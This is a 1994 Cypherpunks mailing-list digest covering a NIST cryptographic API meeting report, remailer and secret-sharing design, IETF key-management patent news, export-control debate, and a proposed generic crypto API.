01DEC94 NIST Cryptographic API Meeting On 01DEC94, NIST (a branch of the US Department of Commerce) convened an "information sharing and discussion" meeting on Cryptographic APIs (CAPI) at Gaithersburg. Present were "leaders in the field of computer cyptography". Some well known figures present were Steve Walker, Dorothy Denning, Burt Kaliski, Warwick Ford, and Miles Smid. Government attendees included 7 from the NSA, 4 from NIST, 5 from the UK MoD, 2 from NASA, and 2 from ARPA. In addition to RSA Labs, BNR, and TIS - other vendors present included Spyrus, IBM, HP, Novell, Microsoft, Datakey, Racal-Guardata, Uptronics, Bankers Trust, National Semiconductor, and myself representing the X/Open (vendor consortium) Security Working Group. The meeting heard presentations on initiatives relating to cryptographic APIs. These comprised: - International Cryptographic Experiment (ICE) - MoD Security in Open Systems Technical Demonstrator Programme - X/Open Cryptographic Service Model - ANS1 X9F1 Layered Cryptographic Service Model - POSIX Cryptographic Study Group - GSS-API - NIST Cryptographic Service Calls draft FIPS - NSA CAPI Goals, Architecture, and Requirements - Royal Holloway University of London CAPI Study - RSA Labs PKCS11 - IBM Generic Cryptographic Interface - BNR/NT Entrust Interface - Spyrus Copies of the slides, and the X/Open draft preliminary specification were distributed to the attendees. I received some unsolicited positive feedback on the X/Open Security Working Group's output from a number of the attendees, and also three requests to join the group. It was a useful validation that X/Open are proceeding down the right track. There was discussion during the meeting on the correct scope for CAPIs, and a debate on the market pressures towards convergence. Two specific threads of activity were identified: 1)standards coordination looks containable given the cooperative and positive attitude among representatives of ANSI, POSIX, NIST, and X/Open. I believe that NIST and the vendor community through X/Open can work together to get agreement on an interface which meets the requirements, is grounded in implementation experience; 2)implementation experience with CAPIs, and associated effort to shift export control policy will be enabled as part of the International Cryptographic Experiment. Timely completion of a cross-industry cryptographic interface, and in parallel its validation in real systems, will then lead to a firm basis for international agreement. ------------------------------------------------------- P V McMahon 06DEC94 ICL Enterprises post: Kings House, 33 Kings Road, Reading, RG1 3PX, UK email: p.v.mcmahon at rea0803.wins.icl.co.uk OR p.mcmahon at xopen.co.uk phone: +44 734 634882 fax: +44 734 855106 ------------------------------------------------------- From hfinney at shell.portal.com Tue Dec 6 10:13:17 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 6 Dec 94 10:13:17 PST Subject: One-shot remailer replies In-Reply-To: <01HKB4JDI40290QGGZ@delphi.com> Message-ID: <199412061812.KAA23245@jobe.shell.portal.com> Mike Ingle writes: >True, the path has to be there, or the message can't go. I can't think of a >fix for that one, can you? Mostly I just don't want an endlessly growing >amount of information out there. I want old information to die after a >while, as keys are erased or expired. No, I can't think of a fix, although your idea at the bottom might be workable in some form. >[ DH exchange / Key broadcast approach ] >Broadcasting a list of keys is one possibility; what if someone else uses >the same key? Birthday theorem makes this hard to prevent. You would want some confirmation that you got the key you requested. The broadcasted key list could be updated to show which ones have been reserved already, marked with a "nonce" (a one-time use secret random number you sent with your request) to show who reserved them. In this case you might not even need to request a specific one, just ask for one to be assigned to you and then look and see which one you got. Of course this assumes a broadcast mechanism but perhaps this is tolerable if there aren't too many remailers. >Pigeonhole holds a one-time reply address. Every week or two it expires and >you send a new one. If a mail comes in, it uses it, and you send a new one. You'd have to watch out for attackers who constantly ping the pigeonhole address and try to see which messages leave the remailer network in a correlated way. >Methinks I'd make it a little more robust than the existing systems (easy >with perl) like being able to grep out a reply header anywhere in the >message, ignore > indentation, and similar safety precautions. Yes, that is a good idea. Many of the existing remailers are also written in perl (calling PGP for decryption) but not much work has been done to improve them in this way. I think there is recognition that the biggest security improvement would come with message quantizing (and not passing subject lines through!) and until we have that the rest is pretty pointless. >RSAREF is useful for public key and DH. Secret sharing we have to get for >ourselves. I looked at Shade v1.0, and it seems to be broken on >little-endian machines. It works on an HP-UX machine, but fails on a >PC running linux with small-endian enabled in shade.h. The half-hour setup >delay is not encouraging, either. Your SECSPLIT is nice and simple, but each >shade is the size of the message. What I need is an error-correcting >protocol to build a no-growth secret splitter. I have not looked at the Shade source. Here is the posting I made to cypherpunks on Krawczyk's method. I wasn't very well organized but if you read through to the end you may be able to get the gist of it: > From inbox/cpz Sat Aug 13 19:00:00 1994 > From owner-cypherpunks at toad.com Sat Aug 13 14:10:33 1994 > Date: Sat, 13 Aug 1994 14:06:25 -0700 > From: Hal > Message-Id: <199408132106.OAA13869 at jobe.shell.portal.com> > To: cypherpunks at toad.com > Subject: Secret sharing made short > Sender: owner-cypherpunks at toad.com > Precedence: bulk > > I came upon a paper with this title in the 1993 Crypto conference proceedings, > by Hugo Krawczyk. He pointed out that with the Shamir-type secret splitting > which we discuss here periodically you have considerable space expansion. > Splitting a message of M bits into N shares causes each share to itself be M > bits. Krawczyk shows a simple system which basically has each share be only > M/N bits. (I will ignore for simplicity the issue of providing a threshold > K > He achieves this be foregoing "pure" information-theoretic secrecy in favor > of "mere" computational secrecy. This is a reasonable tradeoff since most > implementations of Shamir sharing end up relying on computational secrecy > for their random numbers, anyway. > > Krawczyk's idea, in the simple subset I am describing, is almost embarrassingly > easy. Take your message M and encrypt it using a random IDEA or DES key. > Split the resulting cyphertext into N pieces (just carve it up) and give each > piece to a shareholder. Take the IDEA/DES key and Shamir-split it into > N pieces and give those out as well. (Shamir splitting for this case can > be done simply by having N-1 of the pieces be totally random, and having > the last piece be the xor of the IDEA/DES key and the N-1 random pieces. > Only by xor'ing all N pieces can the original key be recovered.) > > Everyone ends up with slightly over M/N bits; they have M/N plus the size > of a DES or IDEA key. But that is pretty close. And unless IDEA or DES can > be broken they will have to recover all of the shares in order to recon- > struct the key and read the message. > > For generalization to the K IDEA or DES key, but the message itself gets split up using an error-cor- > recting code concept so that K pieces are enough to reconstruct the message. > This requires M/K bits per share, plus the overhead for the DES/IDEA key. > > This sounds like it would be a good enhancement to the Shamir splitting code > that was posted here. The IDEA or DES module could be a source of random > bits for the Shamir splitting. PGP's IDEA module is pretty self-contained > and has a random-number entry point. > > (Oh, well, I've come this far, I might as well finish it. The message > distribution scheme Krawczyk gives is this: split the message into K > pieces. Treat each piece as the coefficient of a K-1 degree polynomial. > Evaluate the polynomial at X=0,...,N-1 and let the results be the shares. > Now any K of the shares will allow the polynomial to be reconstructed, and > by concatenating the coefficients we recover M. This is similar to Shamir's > scheme but is not informationally secure and has shares of size M/K.) > > Hal >>Considering all the pros and cons, I am afraid that even the security of >>the one-shot return address is probably insufficient, especially when the >>simple "post replies to usenet encrypted with this key" is so easy and >>safe. Granted it will be a problem once everybody starts doing that, but >>flooding is going to be hard to beat for safety. >Yes, broadcast is the most secure, but it has a fundamental problem: >security scales linearly with bandwidth. If you have a pool of 100 users and >one of them gets a message, your uncertainty is 1 in 100. I've tried without >success to figure out a broadcast mechanism where security scales faster >than linearly with bandwidth. This is true, but you said you are talking about things that can be done today, and today Usenet already has a pool of probably a million users. That is plenty of security. The problem is if everyone starts using it for their replies, but that won't be more than a drop in the bucket for a long time. >We need a mechanism where there is either a circulating data stream or a >large file on a server. An incoming message alters the data somehow, >diffusing the changes over a large area. A request for information selects >out some transformation of the selected data in such a way that the server >cannot correlate the incoming message with the outgoing message. I don't see >any way to do this. This is an interesting idea. It is sort of like broadcast except you would be reducing the bandwidth requirements by only sending certain information to each user. One way to formalize it would be to say that you have two datasets, D1 and D2. These get combined into D12 = f(D1,D2) for some combinging function f. Then we ask whether there is a g(D12) which allows reconstruction of just D1 or D2 in such a way that we can't tell which one it will get just from knowing f and g. Plus, g must output data which is no larger than D1 or D2. In this strict form I don't think it can be done, because you could change D1 and see if g(D12) changed. If it did, then it was getting D1, and if it didn't, it was getting D2. However if we let g be a little bigger then perhaps it wouldn't be so clear. I don't know... >Elimination of the replay traffic-analysis problem is major progress. As for >step-by-step coercion back to the source, I don't see a fix, and we will >probably have to live with that unless there is a major breakthrough. Again, users may not be willing to live with it since they have an alternative right now in usenet. Hal From cactus at hks.net Tue Dec 6 10:19:08 1994 From: cactus at hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 10:19:08 PST Subject: MMB question Message-ID: <199412061823.NAA12765@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Johnathan Corgan writes: > In the errata to Applied Cryptography, Bruce Schneier makes the following > comment, though nowhere did he elaborate on this: > > Pages 266-7: Since the publication of this book, MMB has been > broken. Do not use this algorithm. Well, that settles that. Any more details available from anybody? And: are the errata available on-line anywhere? Sounds like a very worthwhile thing to have. Thanks, - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuSsHioZzwIn1bdtAQEHtAF+LyJDBTjMtuwidsQV3DYjqvSkWpeb0jdG B9GnNuO4dt6jdJLGFOESfybtYD6rM7uZ =0raj -----END PGP SIGNATURE----- From perry at imsi.com Tue Dec 6 10:25:19 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 10:25:19 PST Subject: IETF proposed standard for mime/PEM integration Message-ID: <9412061824.AA19008@webster.imsi.com> The IETF PEM working group has just decided to move the current proposal for a security multiparts extension to MIME forward to draft standard status. WHAT THIS MEANS FOR CYPHERPUNKS: a standard should soon exist for proper integration of encryption and signature programs and email. This will make for easier interoperation between PGP and mail user agents in the fairly near term. Details are available in the security multiparts draft, available for ftp from your nearest RFC repository's internet drafts subdirectory. Perry From perry at imsi.com Tue Dec 6 10:34:32 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 10:34:32 PST Subject: Patents to be placed in PD In-Reply-To: <199412060758.CAA07429@bb.hks.net> Message-ID: <9412061833.AA07377@snark.imsi.com> "L. Todd Masco" says: > This appeared on the IPSEC list (Hooray!). > jwlowe at IBM followed up by announce the dedication of IBM's patent > #5,148,479 to the public. > > Is this the apocalypse or something? Never have I seen such signs > of rationality in companies of this size. This was caused by tremendous pressure and by Sun being forced into a similar move earlier in the day. It was the feeling of many members of the IETF working group that the MKMP proposal from IBM could not be considered without the patents being fixed up. Similarly, it was the feeling of the group that SKIP from Sun was unacceptable without the patents being fixed. Sun announced low cost licenses which were still unacceptable. IBM announced free licences. Sun announced that the patents would be assigned to the public domain. IBM announced the same four hours later. Your faithful IETF correspondant... .pm From cactus at hks.net Tue Dec 6 10:54:30 1994 From: cactus at hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 10:54:30 PST Subject: Patents to be placed in PD Message-ID: <199412061858.NAA13101@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- A number of people have asked me what SKIP is. IBM's patent covered modular key management in a manner that isn't clear to me. SKIP is Simple Key management for Internet Protocols: it's an elegant key management system that uses Diffie-Hellman public keys (Aziz notes that any DH-like scheme will work). The IPsec folks wanted (or just were considering it?) to use it in their secure IP work, but were balking at the patent status. Here's how to get the draft (I don't understand it well enough yet to do it justice in a summary) : - --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Internet Protocol Security Protocol Working Group of the IETF. Title : Simple Key-Management For Internet Protocols (SKIP) Author(s) : A. Aziz Filename : draft-ietf-ipsec-aziz-skip-00.txt Pages : 17 Date : 10/26/1994 There are occasions where it is advantageous to put authenticity and privacy features at the network layer. The vast majority of the privacy and authentication protocols in the literature deal with session oriented key-management schemes. However, many of the commonly used network layer protocols (e.g IP and IPv6) are session-less datagram oriented protocols. We describe a key-management scheme that is particularly well suited for use in conjunction with a session-less datagram protocol like IP or IPv6. We also describe a simple extension of this protocol to provide scalable group key-management for Internet multicasting protocols. SKIP is designed to be plugged into the IP Security Protocol (IPSP) or IPv6. This draft describes how to use SKIP in the context of the IPSP. Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and password "guest". After logging in, Type "cd internet-drafts". "get draft-ietf-ipsec-aziz-skip-00.txt". Internet-Drafts directories are located at: o US East Coast Address: ds.internic.net (198.49.45.10) o US West Coast Address: ftp.isi.edu (128.9.0.32) o Pacific Rim Address: munnari.oz.au (128.250.1.21) o Europe Address: nic.nordu.net (192.36.148.17) Internet-Drafts are also available by mail. Send a message to: mailserv at ds.internic.net. In the body type: "FILE /internet-drafts/draft-ietf-ipsec-aziz-skip-00.txt". NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. For questions, please mail to Internet-Drafts at cnri.reston.va.us. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. - --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" - --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv at ds.internic.net" Content-Type: text/plain Content-ID: <19941026102713.I-D at CNRI.Reston.VA.US> ENCODING mime FILE /internet-drafts/draft-ietf-ipsec-aziz-skip-00.txt - --OtherAccess Content-Type: Message/External-body; name="draft-ietf-ipsec-aziz-skip-00.txt"; site="ds.internic.net"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <19941026102713.I-D at CNRI.Reston.VA.US> - --OtherAccess-- - --NextPart-- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuS0XioZzwIn1bdtAQHJzQGA0MVuRr2weN8u058zZD0wzkjTtYadtYiH Ybgztk2dRevg44wvwYSHOgn6+qFYh7Pa =M7Om -----END PGP SIGNATURE----- From rishab at dxm.ernet.in Tue Dec 6 10:58:51 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 6 Dec 94 10:58:51 PST Subject: GATT and ITAR-crypto Message-ID: pcw at access.digex.net (Peter Wayner): > I want to know whether GATT will affect the export of encryption > software. It seems to frown upon any barrier to trade and I think > I could argue, perhaps not correctly, that if ACME in Taiwan > can't buy the necessary encryption software to do business with > CENTRAL in Kansas, then ACME is prevented from competing in America. > BONEHEAD Inc, from North Dakota won't have to worry about foreign > competition. Heh heh. Missiles R Us in Iran can't buy target analysis software so can't compete in the US cruise missile market; GD needn't bother about cheaper Iranian labour costs. As you correctly noted later, exceptions are made for missiles (and French movies, and US _peanuts_) - IAC US policy is to treat crypto as munitions, or at best 'dual-use' tech. GATT does not affect other arms treaties - NPT, MTCR, etc... "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From perry at imsi.com Tue Dec 6 11:08:10 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 11:08:10 PST Subject: Patents to be placed in PD In-Reply-To: <199412061858.NAA13101@bb.hks.net> Message-ID: <9412061906.AA07443@snark.imsi.com> "L. Todd Masco" says: > IBM's patent covered modular key management in a manner that isn't > clear to me. Not just you; the opinion of some of the IBMers there was that they didn't think it covered their proposal, either. > SKIP is Simple Key management for Internet Protocols: it's an elegant > key management system that uses Diffie-Hellman public keys (Aziz notes > that any DH-like scheme will work). The IPsec folks wanted (or just > were considering it?) to use it in their secure IP work, but were balking > at the patent status. Just considering it. In my opinion, none of the existing key management proposals is sufficient. They all have the feature that very good cryptographers have sweated over the cryptography in them but that the systems don't attach enough information to the resultant security associations to permit you to actually write secure applications, which in the end makes the excercise less than completely successfull. .pm From norm at netcom.com Tue Dec 6 11:40:52 1994 From: norm at netcom.com (Norman Hardy) Date: Tue, 6 Dec 94 11:40:52 PST Subject: MacPGP Message-ID: Does anyone know of a manual for the Mac PGP 2.6? I can find the functions that I need in the command line interface manual but then it is unclear how to get excatly that function thru menu selections. The command R function reads commands from a file. It is awkward and keeps warning you that it is buggy. I can imagine writing such a manual but before I know the answers it would be inaccurate and after I know the answers it would seem superflous. From jamiel at sybase.com Tue Dec 6 12:19:30 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Tue, 6 Dec 94 12:19:30 PST Subject: Ride to CP meeting request Message-ID: If anyone is headed to this month's meeting from San Francisco and has a seat they'd like to let me occupy, please email me. -carless in SF From perry at sutr.cynic.org Tue Dec 6 12:38:00 1994 From: perry at sutr.cynic.org (Perry The Cynic) Date: Tue, 6 Dec 94 12:38:00 PST Subject: Shrinking government In-Reply-To: <9412061145.AA15280@ininx> Message-ID: jkreznar at ininx.com (John E. Kreznar) writes: > Tax revolts do no good. Taxes are the _result_, not the cause. Perhaps. But anger over taxation can be a powerful galvanizing force that gets disinterested, apolitical, apathetic people to stand up and vote. It may not be your philosophical piece of cake, but it works. Besides, getting angry at the result of a policy is a good first step to questioning the policy itself. "If you don't like high taxes, think of where all that money is going." > The cause of big government is popular gratuitous acceptance of > government favor. It's hardly gratuitous. The general public feeling nowadays, that their money is being taken whether they consent or not. Given that (nonconsensual takings backed by prevailing law), it is perfectly rational to "get yours", i.e. milk the resulting machine for whatever you can do (including, i might note, disregarding prevailing IRS codes). It's not a "government favor", it's called "getting back your money." > If you want to shrink government, you've got to begin by changing the > minds of a hundred million of your neighbors who think it's civilized to > take a government job or contract, accept social security, apply for an > SBA loan or FEMA assistance, and on down the list. Not necessarily. It is quite enough to convince many of your neighbors that they (a) are not getting their tax money's worth back from the government(s), and that (b) there's a better way. Right now, it seems that (a) is gathering steam. The problem is expressing (b) - which many of us are convinced of - in terms Mr./Ms. Average Voter can agree with... and "taking money from government is uncivilized" does not strike me as very effective. -- perry --------------------------------------------------------------------------- Perry The Cynic perry at cynic.org To a blind optimist, an optimistic realist must seem like an Accursed Cynic. --------------------------------------------------------------------------- From cactus at hks.net Tue Dec 6 13:15:01 1994 From: cactus at hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 13:15:01 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <199412062119.QAA14522@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I've been thinking a lot recently about how to implement a generic API for crypto such that the interface could be independent of the cipher used. What I'm thinking of is something like: guc_init_crypto(); guc_encrypt(); guc_decrypt(); guc_assemble(); guc_key_get(); guc_key_put(); guc_key_gen(); So, to encrypt a PGP-style message, you'd: guc_init_cypto("PGP_26", &context, &keys, &message ); Which would initialize whatever random vectors you're likely to need for a PGP session and allocate the appropriate space to the pointers. The types should be totally opaque, implemented in the library. guc_key_gen("PGP_26", &keys); Which would generate a session key for IDEA and grow the keys structure appropriately; guc_get_key("PGP_26", &keys, originator); guc_get_key("PGP_26", &keys, recipient1); guc_get_key("PGP_26", &keys, recipient2); ... Which would grow the keys structure and add in appropriate RSA keys. (Alternatively, it could be done as one vector with all the recipients lists). guc_encrypt("PGP_26", &keys, &input, &message); Which would encrypt the IDEA session key with the appropriate RSA key and the input with the IDEA session key. And, guc_seal("PGP_26", &message, &output); Which would put the messages into the appropriate (Radix-64?) format and put it out to the output, (the output structure would specify whether memory is to be allocated and filled, files written to, whatever). My goal is to come up with an API that could be integrated once into an application and would be flexible enough that new crypto methods, whether ciphers or key management, could be supported entirely by upgrading the library. This includes being flexible enough to cover as diverse methods as OTPs (where the init function would open a file or other pad as its "random vector," key retrieval would be a noop, and encode would just XOR) and PEM (key management would be done on the basis of the method specified. I'm fuzzy on how to generalize key management into a model that would include both web-of-trust and PEM-style certificates, so conversation on this would be greatly appreciated). It seems to me that the benefits are pretty clear: Set up such an API as a spec that can be implemented both inside and outside of the US and it allows everybody to implement to one API. There's no good reason to have a bazillion different crypto APIs if a generalized one can be achieved. I've posted about this before and received no response: since I'd like to solidify the API soon so I can firm up the coding I'm doing, I ask that folks take the time to comment. The code I end up producing will be publicly available, possibly as a "non-commercial use" copyright, perhaps PD. Thoughts? - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuTVNCoZzwIn1bdtAQFK1AGA16g1wgKMc4qg3SVxDMW3y+1IGeWDbVvj Q6uqlRmyaFNm1NjNfV0gCxZgAZ9oM338 =br4C -----END PGP SIGNATURE----- From gnu Tue Dec 6 13:30:08 1994 From: gnu (gnu) Date: Tue, 6 Dec 94 13:30:08 PST Subject: Ho, Ho, Ho Message-ID: <9412062130.AA16454@toad.com> Forwarded-by: Mike Godwin From: "Eugene Volokh" You'd better watch out, You'd better not cry, You'd better not pout; I'm telling you why. Santa Claus is tapping Your phone. He's bugging your room, He's reading your mail, He's keeping a file And running a tail. Santa Claus is tapping Your phone. He hears you in the bedroom, Surveills you out of doors, And if that doesn't get the goods, Then he'll use provocateurs. So--you mustn't assume That you are secure. On Christmas Eve He'll kick in your door. Santa Claus is tapping Your phone. [Supposedly written for and sung at a US Department of Justice, Office of Legal Counsel Christmas party during the Carter administration.] -- Eugene Volokh, UCLA Law From bshantz at spry.com Tue Dec 6 13:47:26 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Tue, 6 Dec 94 13:47:26 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <9412062142.AA08621@homer.spry.com> L.Todd Masco writes: >I've been thinking a lot recently about how to implement a generic API for >crypto such that the interface could be independent of the cipher used. So, you just want a generic overlay (wrapper) to any of the existing encryption algorithms? Is this correct? >My goal is to come up with an API that could be integrated once into an >application and would be flexible enough that new crypto methods, whether >ciphers or key management, could be supported entirely by upgrading the >library. This includes being flexible enough to cover as diverse >methods as OTPs ... Well, it sounds good in theory. However, trust me, Todd, writing a generic API that is multi-platfomr is not necessarily as easy as it sounds. There's alot of code in this prioject. You would also have to make sure that the API is generic so it could work in ANY program that might use encryption or digital signatures. (i.e. e-mail, USENET news, possibly even lending itself to a Secure HTTP implementation.) >(key management would be done on the basis of the method specified.) Uh, just from a first glance, I'd say that this is going to slip gently into the ITAR pits. There are very few "methods" other than RSAREF that you could use to make this "universal". Also, would this act as a wrapper over PGP, or would it use the same concepts (and or code) to do the same things? >It seems to me that the benefits are pretty clear: Set up such an API >as a spec that can be implemented both inside and outside of the US and >it allows everybody to implement to one API. There's no good reason to >have a bazillion different crypto APIs if a generalized one can be >achieved. Agreed, it would be nice to have one API. As a developer though, I panic when I see "generic" API's. Usually, they are not as "black-box" as people would like to believe. What I mean is, usually they are not just as simple as "put in this input, and you will get this output." Also, are we talking about C code or C++ code? DOS? Windows? Are we talking multi-platform code that will work on all the major OS's? For a generic API, that's alot of code...I keep saying that....must mean something. I would be interested in seeing something like this implemented, but I question whether it will be a hit as an industry standard. Generic API's really haven't gone over well for things in the past. (Except the class libraries for major C++ compilers. MFC, OWL, etc.) The design has to be robust before you start coding. Anyone else have any comments? Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From ianf at sydney.sgi.com Tue Dec 6 13:51:57 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 6 Dec 94 13:51:57 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting In-Reply-To: <199412060628.WAA07448@syzygy.com> Message-ID: <9412070836.ZM4161@wiley.sydney.sgi.com> On Dec 5, 10:28pm, KT Kislitzin wrote: > This month's Bay Area Cypherpunks Meeting will be held this Saturday, > December 10th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris > (same cypher time, same cypher channel...). > > The topic for this month's discussions is: > > Technical Cryptography > > We have three speakers planned. [...] There isn't a chance that this could either be taped or broadcast, is there? This sounds like it will be a fascinating meeting, and deserves a wider audience. Ian. From sleas at d.umn.edu Tue Dec 6 14:08:01 1994 From: sleas at d.umn.edu (shawn leas) Date: Tue, 6 Dec 94 14:08:01 PST Subject: core dumps with pgp-elm Message-ID: <199412062205.QAA17119@ub.d.umn.edu> -----BEGIN PGP SIGNED MESSAGE----- Anybody else get this problem?? I've tried all sorts of different things. Compiles fine, runs fine w/out pgp options, but crashes like a stone when I use them. Segmentation violation. That sucks! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuTgGaZRyOzqm29xAQHIsgP9Hw2Wq84gOZ3sCx0qzVQAYY9JimC1/avD 6YMFEL3cRv0KhVeFV1gNKB7DC1wmypstoVTgcy9xiGZdxXvzQ6/dmrqmpWzt2+Fi GscQMUVHNfi18pX5X+8gjbZpDfD28tc6XW1gPDP5150n1pngTUQ7HXMcqJIxklj3 DmcP3W3+qAo= =YO8U -----END PGP SIGNATURE----- From jya at pipeline.com Tue Dec 6 14:10:39 1994 From: jya at pipeline.com (John Young) Date: Tue, 6 Dec 94 14:10:39 PST Subject: MMB question Message-ID: <199412062215.RAA15048@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Responding to msg by cactus at hks.net ("L. Todd Masco") on Tue, 6 Dec 1:23 PM >And: are the errata available on-line anywhere? Sounds >like a very >worthwhile thing to have. Applied Cryptography states on the inner flyleaf: Errata -- A list of the errors found in this book along with corresponding corrections is updated periodically. For the most recent electronic version, send email to: schneier at chinet.com For the most recent printed version, send a stamped, self-addressed envelope to: AC Corrections Counterpane Systems 730 Fair Oaks Avenue Oak Park, IL 60302 Readers are encouraged to distribute electronic or printed versions of this list to other readers of this book. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuTiJyoZzwIn1bdtAQGIBAGA2HKGp+3qSsythB5es+QE0lmxrEuc3kKs zMcBE+OoYdR+yofyFPKBxUGU1Z3w8ZQM =27st -----END PGP SIGNATURE----- From cactus at hks.net Tue Dec 6 14:18:05 1994 From: cactus at hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 14:18:05 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <199412062222.RAA15156@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- bshantz at spry.com writes: > L.Todd Masco writes: > > >I've been thinking a lot recently about how to implement a generic API for > >crypto such that the interface could be independent of the cipher used. > > So, you just want a generic overlay (wrapper) to any of the existing > encryption algorithms? Is this correct? More or less. It doesn't need to implement everything straight off: the API itself just has to pass all the information that's necessary. > >My goal is to come up with an API that could be integrated once into an > >application and would be flexible enough that new crypto methods, whether > >ciphers or key management, could be supported entirely by upgrading the > >library. This includes being flexible enough to cover as diverse > >methods as OTPs ... > > Well, it sounds good in theory. However, trust me, Todd, writing a generic > API that is multi-platfomr is not necessarily as easy as it sounds. There's > alot of code in this prioject. You would also have to make sure that the API Actually, I'm not talking about implementing the library in a multi-platform way. Once the API is specified, people could be found who would do the implementation for any given platform. I'd do a UNIX version that would straight off translate appropriate calls to RSAREF for RSA calls and implement IDEA. A friend of mine is interested in doing the PC version . > is generic so it could work in ANY program that might use encryption or > digital signatures. (i.e. e-mail, USENET news, possibly even lending itself > to a Secure HTTP implementation.) Encryption is a pretty straightforward process in the abstract: While such an API might not be well suited to hyper-fast stream methods, it would be Good Enough to have something that could be integrated into mail and news easily. News and mail are doing the same thing: a big part of the difficulty in getting integrated support is in the cumbersome interface to PGP and the percieved short horizon on PGP changes. If a unified API promised that a crypto API would stay put, I think more people would be hacking code. I'm not talking about implementing it all at once. In essence, a PGP engine that used these calls would be useful because people could implement MUAs and newsreaders (and perhaps web browsers) that easily integrated PGP encryption by linking with the newest version of the PGP distribution: and then, as newer methods and formats came along, all that would be required would be a relink to support new formats (another function, BTW, would be a guc_parse_format() that would determine the format of the input). > >(key management would be done on the basis of the method specified.) > > Uh, just from a first glance, I'd say that this is going to slip gently into > the ITAR pits. There are very few "methods" other than RSAREF that you > could use to make this "universal". Also, would this act as a wrapper > over PGP, or would it use the same concepts (and or code) to do the same > things? Only the spec itself need be exported, no crypto code or even hooks. RSAREF would have to be part of the RSA methods inside the US: outside, it would probably end up being the old PGP code that the current 2.6ui-style PGPs use. > Agreed, it would be nice to have one API. As a developer though, I > panic when I see "generic" API's. Usually, they are not as > "black-box" as people would like to believe. What I mean is, usually > they are not just as simple as "put in this input, and you will get > this output." Also, are we talking about C code or C++ code? DOS? > Windows? Are we talking multi-platform code that will work on all the > major OS's? For a generic API, that's alot of code...I keep saying > that....must mean something. Certainly, some APIs are much better than others. The C stdlib, for example, is a pretty good API. Stdio does a very good job of abstracting concepts to calls that work across filesystems as different as VMS's RMS and MS-DOS filesystems. I'm talking about C -- not every platform supports C++. The OS isn't important: the API can be implemented independently. > I would be interested in seeing something like this implemented, but I > question whether it will be a hit as an industry standard. Generic API's > really haven't gone over well for things in the past. (Except the class > libraries for major C++ compilers. MFC, OWL, etc.) > The design has to be robust before you start coding. Frankly, I don't give a damn about it becoming an "idustry standard" if that means Microsoft, Lotus, etc. I have no interest in doing their work for them. I'm more interested in generating a "net-standard," something that people 